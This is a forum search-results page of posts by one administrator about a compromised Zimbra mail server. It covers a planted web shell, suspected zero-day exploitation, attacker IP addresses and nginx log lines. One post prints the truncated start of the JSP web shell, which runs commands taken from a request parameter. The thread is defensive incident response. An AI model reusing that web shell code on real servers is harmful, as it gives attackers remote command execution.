Search found 50 matches

by thomas.klaube
Thu Apr 06, 2023 8:38 am
Forum: Administrators
Topic: [SOLVED] The end of Zimbra? update to 10 is impossible and 8 and 9 goes eol shortly ....
Replies: 42
Views: 84751

Re: The end of Zimbra? update to 10 is impossible and 8 and 9 goes eol shortly ....

Hi all, we support dozens of Zimbra installations, most of them single server, some multi-server. 2 (that is "two") are running Zimbra 9.0, all others are on 8.8.15. The reason was already pointed out by Klug - our users are just not interested in the "modern UI" as it lacks soooo m...
by thomas.klaube
Tue Apr 04, 2023 4:40 pm
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Hi Chris,

Thanks a lot for your feedback! I have updated the information in our Zimbra call. I pointed out that there is probably a risk for servers running P37 and p38. I have escalated this issue as much as I could.

Do you have - by any chance - server logs from Feb 12th?

Thanks and regards
Thomas
by thomas.klaube
Tue Apr 04, 2023 2:54 pm
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

I am going to throw some stuff out there on the only server I have that isn't 0-trust. I have nginx logs back for 5 months on this server. % check_attacks.pl -logDir=`pwd` --search heartbeat [ 404] GET https://X.X.X.X/public/heartbeat.jsp Fuzz Faster U Fool v1.5.0 The above all happened on March 24...
by thomas.klaube
Tue Apr 04, 2023 2:31 pm
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Hello Thomas, The timestamp for heartbeat.jsp was 12th Feb. I have restored my mail server from a snapshot taken 16th Jan. I can confirm that heartbeat.jsp was not present and that the web interface works again. The version of Zimbra I have restored is Release 8.8.15_GA_3953.RHEL8_64_20200629025823...
by thomas.klaube
Tue Apr 04, 2023 12:51 pm
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

My Zimbra is Release 8.8.15_GA_3953.RHEL8_64_20200629025823 UNKNOWN_64 FOSS edition, Patch 8.8.15_P38, running on fully patched AlmaLinux 8.7. The only ports allowed from the Internet are SMTP and HTTP/S. Pax is installed ([zimbra@mail ~]$ pax --version gives "spax: star 1.5.3 (x86_64-unknown-...
by thomas.klaube
Tue Apr 04, 2023 8:55 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

For the infected users, is it possible your exploit is related to the issue discussed here: https://forums.zimbra.org/viewtopic.php?t=71693 ? Not in my case. The server didn't have clamav installed. Posts to the forums describing unpatched exploits will not be approved. Hope that helps, Mark What d...
by thomas.klaube
Mon Apr 03, 2023 11:52 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Contents of the heartbeat.jsp file: <%@ page import="java.util.*,java.io.*"%><%%><%if (request.getParameter("cmd") != null) {Process p; if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){ p = Runtime.getRuntime().exec("cmd.exe /C ...
by thomas.klaube
Mon Apr 03, 2023 11:35 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

The attacker's files are: - heartbeat.jsp - info.jsp - style.css In my case, the IP address of the attacker was 185.246.188.67 (it is on the abuse list). Do you know the timestamps of the files? On my server the heartbeat.jsp had a timestamp of Feb 12th. So the files were placed there some time ago. ...
by thomas.klaube
Mon Apr 03, 2023 9:21 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Hi all, I found this in nginx.log. 185.246.188.73:45592 - - [31/Mar/2023:18:47:46 +0200] "POST https://192.168.0.1/public/heartbeat.jsp HTTP/1.1" 200 406 "-" "python-requests/2.25.1" the heartbeat.jsp was placed in /opt/zimbra/jetty/webapps/zimbra/public previously - b...
by thomas.klaube
Mon Apr 03, 2023 8:29 am
Forum: Administrators
Topic: Down for maintenence, administrators see /opt/zimbra/status.txt
Replies: 62
Views: 85450

Re: Down for maintenence, administrators see /opt/zimbra/status.txt

Hi all,

I opened a Zimbra case. Case No. is 01475766.

I suspect a zero day exploit - actively being exploited... I can only guess how many Zimbra servers out there are at severe risk...

Regards
Thomas